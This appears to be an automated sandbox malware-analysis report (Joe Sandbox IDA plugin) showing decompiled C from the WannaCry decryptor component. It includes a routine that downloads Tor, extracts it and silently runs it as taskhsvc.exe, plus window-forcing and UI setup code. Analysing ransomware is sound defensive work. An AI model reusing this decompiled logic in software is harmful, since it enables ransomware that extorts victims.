                                  				_push(__ecx);
                                  				_t119 = __ecx;
                                  				_push(_a4);
                                  				_push(0x66);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                  				_v12 = 1;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                  				_v12 = 2;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                  				_v12 = 3;
                                  				E004085C0(__ecx + 0x120);
                                  				_v12 = 4;
                                  				E004085C0(__ecx + 0x1a4);
                                  				_v12 = 5;
                                  				E00404090(__ecx + 0x228);
                                  				_v12 = 6;
                                  				E00404090(__ecx + 0x290);
                                  				_v12 = 7;
                                  				E00404090(__ecx + 0x2f8);
                                  				_v12 = 8;
                                  				E00404090(__ecx + 0x360);
                                  				_v12 = 9;
                                  				E00405000(__ecx + 0x3c8);
                                  				_v12 = 0xa;
                                  				E00405000(__ecx + 0x444);
                                  				_v12 = 0xb;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                  				_v12 = 0xc;
                                  				L00412DA6();
                                  				_v12 = 0xd;
                                  				L00412DA6();
                                  				_v12 = 0xe;
                                  				L00412DA6();
                                  				_v12 = 0xf;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                  				_v12 = 0x1b;
                                  				_t82 = E00407640(__ecx + 0x888);
                                  				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 0x1d;
                                  				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				L00412E5A();
                                  				_push(0x80);
                                  				_push(0xe);
                                  				L00412F2C();
                                  				_t83 = LoadIconA(_t82, 0x80); // executed
                                  				_push(0x421798);
                                  				 *(_t119 + 0x82c) = _t83;
                                  				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                  				L00412DA0();
                                  				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                  				 *[fs:0x0] = _v44;
                                  				return _t119;
                                  			}

                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040B840() {
                                  				void _v519;
                                  				char _v520;
                                  				void _v1039;
                                  				char _v1040;
                                  				struct _STARTUPINFOA _v1108;
                                  				struct _PROCESS_INFORMATION _v1124;
                                  				char _t29;
                                  				long _t33;
                                  				int _t37;
                                  				void* _t46;
                                  				char _t47;
                                  				long _t51;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t84;
                                  				void* _t86;
                                  
                                  				_t29 =  *0x421798; // 0x0
                                  				_v1040 = _t29;
                                  				memset( &_v1039, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                  				_t84 =  &_v1124 + 0x20;
                                  				_t33 = GetFileAttributesA( &_v1040); // executed
                                  				if(_t33 != 0xffffffff) {
                                  					L8:
                                  					_v1108.cb = 0x44;
                                  					_v1124.hProcess = 0;
                                  					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                  					_v1124.hThread = 0;
                                  					_v1124.dwProcessId = 0;
                                  					_v1124.dwThreadId = 0;
                                  					_v1108.wShowWindow = 0;
                                  					_v1108.dwFlags = 1;
                                  					_t37 = CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124); // executed
                                  					if(_t37 != 0) {
                                  						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                  							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                  						}
                                  						CloseHandle(_v1124);
                                  						CloseHandle(_v1124.hThread);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
                                  					_t86 = _t84 + 0xc;
                                  					if(_t46 != 0) {
                                  						L5:
                                  						_t47 =  *0x421798; // 0x0
                                  						_v520 = _t47;
                                  						memset( &_v519, 0, 0x81 << 2);
                                  						asm("stosw");
                                  						asm("stosb");
                                  						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                  						_t84 = _t86 + 0x20;
                                  						_t51 = GetFileAttributesA( &_v520); // executed
                                  						if(_t51 != 0xffffffff) {
                                  							CopyFileA( &_v520,  &_v1040, 0); // executed
                                  							goto L8;
                                  						} else {
                                  							return 0;
                                  						}
                                  					} else {
                                  						_push(0);
                                  						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
                                  						_t86 = _t86 + 0xc;
                                  						if(_t55 != 0) {
                                  							goto L5;
                                  						} else {
                                  							_push(0);
                                  							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                  							_t86 = _t86 + 0xc;
                                  							if(_t56 != 0) {
                                  								goto L5;
                                  							} else {
                                  								return _t56;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNELBASE(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-3937372533
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v24;
                                  				char _v32;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v72;
                                  				char _v80;
                                  				char _v88;
                                  				char _v96;
                                  				char _v104;
                                  				char _v112;
                                  				char _v120;
                                  				void* _v140;
                                  				void* _v928;
                                  				void* _v932;
                                  				void* _v936;
                                  				void* _v1000;
                                  				char _v1124;
                                  				char _v1248;
                                  				char _v1352;
                                  				char _v1456;
                                  				char _v1560;
                                  				char _v1664;
                                  				char _v1796;
                                  				char _v1928;
                                  				void* _v1992;
                                  				void* _v2056;
                                  				void* _v2120;
                                  				char _v2212;
                                  				char _v2216;
                                  				intOrPtr _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413A76);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t144;
                                  				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                  				_push(0);
                                  				L00412F08();
                                  				L00412F02();
                                  				L00412EFC();
                                  				E004060E0( &_v2212, 0);
                                  				_v8 = 0;
                                  				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                  				L00412B72(); // executed
                                  				_v8 = 0x1d;
                                  				_v24 = 0x415a30;
                                  				E00403F20( &_v24);
                                  				_v8 = 0x1c;
                                  				_v32 = 0x415a30;
                                  				E00403F20( &_v32);
                                  				_v8 = 0x1b;
                                  				_v40 = 0x415a30;
                                  				E00403F20( &_v40);
                                  				_v8 = 0x1a;
                                  				_v48 = 0x415a44;
                                  				E00403F20( &_v48);
                                  				_v8 = 0x19;
                                  				_v56 = 0x415a44;
                                  				E00403F20( &_v56);
                                  				_v8 = 0x18;
                                  				_v64 = 0x415a44;
                                  				E00403F20( &_v64);
                                  				_v8 = 0x17;
                                  				_v72 = 0x415a44;
                                  				E00403F20( &_v72);
                                  				_v8 = 0x16;
                                  				_v80 = 0x415a44;
                                  				E00403F20( &_v80);
                                  				_v8 = 0x15;
                                  				_v88 = 0x415a44;
                                  				E00403F20( &_v88);
                                  				_v8 = 0x14;
                                  				_v96 = 0x415a44;
                                  				E00403F20( &_v96);
                                  				_v8 = 0x13;
                                  				_v104 = 0x415a44;
                                  				E00403F20( &_v104);
                                  				_v8 = 0x12;
                                  				E00403F90( &_v112);
                                  				_v8 = 0x11;
                                  				E00403F90( &_v120);
                                  				_v8 = 0x10;
                                  				L00412CC2();
                                  				_v8 = 0xf;
                                  				L00412CC2();
                                  				_v8 = 0xe;
                                  				L00412CC2();
                                  				_v8 = 0xd;
                                  				L00412CC2();
                                  				_v8 = 0xc;
                                  				L00412EF6();
                                  				_v8 = 0xb;
                                  				E004050A0( &_v1124);
                                  				_v8 = 0xa;
                                  				E004050A0( &_v1248);
                                  				_v8 = 9;
                                  				E00404170( &_v1352);
                                  				_v8 = 8;
                                  				E00404170( &_v1456);
                                  				_v8 = 7;
                                  				E00404170( &_v1560);
                                  				_v8 = 6;
                                  				E00404170( &_v1664);
                                  				_v8 = 5;
                                  				E00405D90( &_v1796);
                                  				_v8 = 4;
                                  				E00405D90( &_v1928);
                                  				_v8 = 3;
                                  				L00412EF0();
                                  				_v8 = 2;
                                  				L00412EF0();
                                  				_v8 = 1;
                                  				L00412D4C();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return 0;
                                  			}


                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 3942368781-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 407a90-407ab7 179 407bf4-407c28 #2385 178->179 180 407abd-407ac5 178->180 181 407ac7 180->181 182 407aca-407ad1 180->182 181->182 182->179 183 407ad7-407af9 call 404c40 #2514 182->183 186 407b72-407bef #2414 * 2 #800 #641 183->186 187 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 183->187 186->179 187->186
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v4;
                                  				char _v8;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char _v32;
                                  				void* _v36;
                                  				char _v44;
                                  				char _v132;
                                  				char* _v136;
                                  				void* _v140;
                                  				void* _v144;
                                  				void* _v148;
                                  				void* _v152;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v168;
                                  				void* _v180;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  				void* _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F17);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t72;
                                  				_t73 = _t72 - 0x80;
                                  				_t70 = __ecx;
                                  				if(_a4 == 0x1388) {
                                  					_t43 = __ecx + 0x2f8;
                                  					if(_t43 != 0) {
                                  						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                  					}
                                  					if(_a8 == _t43) {
                                  						_t44 = E00404C40( &_v132, 0);
                                  						_v8 = 0;
                                  						L00412B72();
                                  						if(_t44 == 1) {
                                  							_push("***");
                                  							L00412CAA();
                                  							_push("\t");
                                  							_v8 = 1;
                                  							L00412F68();
                                  							_push( &_v44);
                                  							L00412F62();
                                  							_push(0x3b);
                                  							_push(0xa);
                                  							L00412F5C();
                                  							_push(0x3b);
                                  							_push(0xd);
                                  							L00412F5C();
                                  							_push(1);
                                  							_v164 = _t73;
                                  							L00412F56();
                                  							E004082C0(_t70,  &_v168,  &_v160);
                                  							_v44 = 0;
                                  							L00412CC2();
                                  						}
                                  						_v4 = 2;
                                  						_v20 = 0x415c00;
                                  						_v136 =  &_v20;
                                  						_v4 = 5;
                                  						L00412D52();
                                  						_v20 = 0x415bec;
                                  						_v136 =  &_v32;
                                  						_v32 = 0x415c00;
                                  						_v4 = 6;
                                  						L00412D52();
                                  						_v32 = 0x415bec;
                                  						_v4 = 2;
                                  						L00412CC2();
                                  						_v4 = 0xffffffff;
                                  						L00412C86();
                                  					}
                                  				}
                                  				_t42 = _a8;
                                  				_push(_a12);
                                  				_push(_t42);
                                  				_push(_a4);
                                  				L00412BAE(); // executed
                                  				 *[fs:0x0] = _v24;
                                  				return _t42;
                                  			}


                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 223 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
